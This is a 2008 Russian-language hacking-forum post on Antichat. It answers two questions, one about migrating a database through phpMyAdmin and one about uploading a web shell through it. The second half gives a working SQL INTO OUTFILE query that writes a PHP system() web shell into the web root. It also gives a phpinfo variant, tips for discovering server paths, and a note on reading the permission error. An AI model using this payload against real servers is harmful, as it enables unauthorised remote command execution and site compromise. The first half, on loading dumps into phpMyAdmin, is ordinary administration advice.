ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #4  
Старый 27.11.2008, 20:59
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

sadfeel

Если залить БД на сервер, то вариантов несколько;

Если БД данными не сильно наполнена! То у себя локально делаешь дамп структура+данные, в случае если у тебя структура не создана на хостере, иначе просто данные. Заходишь в phpmyadmin , выбираешь свою БД, кликаешь на sql-запрос, копируешь содержимое своего дампа в окно запроса, корректишь имя БД или хоста, ну и жмешь кнопку "Пошел".
Если БД заполнена данными конкретно. Делаешь дамп только структуры своей БД. Создаешь ее тем же phpmyadmin'ом у хостера. Делаешь у себя в локальной БД выгрузку данных обычным запросом: сколько таблиц, столько и файлов получишь. Потом эти файлы также можно загрузить в phpmyadmin, при помощи фичи - загрузка данных через файл.
Если хостер позволяет удаленно подключаться тем же MySQL Front или MySQL CC, то можно прямо с API любого все сделать.

Если залить шелл через PHPmyadmin, то можно попробывать зделать следующие:

если есть права на запись, выполняй запрос

Код:
SELECT '<?php system($cmd) ?>' FROM `table` INTO OUTFILE '/home/site/www/dir/shell.php'
/home/site/www/dir/shell.php- Подставляешь свое значение.

в phpmyadmin много способов узнать локальный путь например: какой-нибудь файл который обычно не вызывается на прямую а только инклудится, а поэтому можно попробовать select '<? phpinfo(); ?>' into outfile '/path_to_phpmyadmin/shell.php'

Если пишет #1045 - Access denied for user 'name'@'localhost' (using password: YES)

то значит нет прав на заливку.
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PhpMyAdmin dimauz Уязвимости 21 26.01.2007 23:06
Уязвимости phpMyAdmin 2.6.0-pl2 yanus Уязвимости 1 13.03.2006 13:48
Как залить шелл через PhpMyAdmin? Buga Форумы 15 16.02.2006 22:18
Залить remview.php через phpMyAdmin Grom PHP, PERL, MySQL, JavaScript 8 05.02.2006 00:19
Как через phpmyadmin запрость данные пользователей ? Майор Форумы 3 26.12.2004 02:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ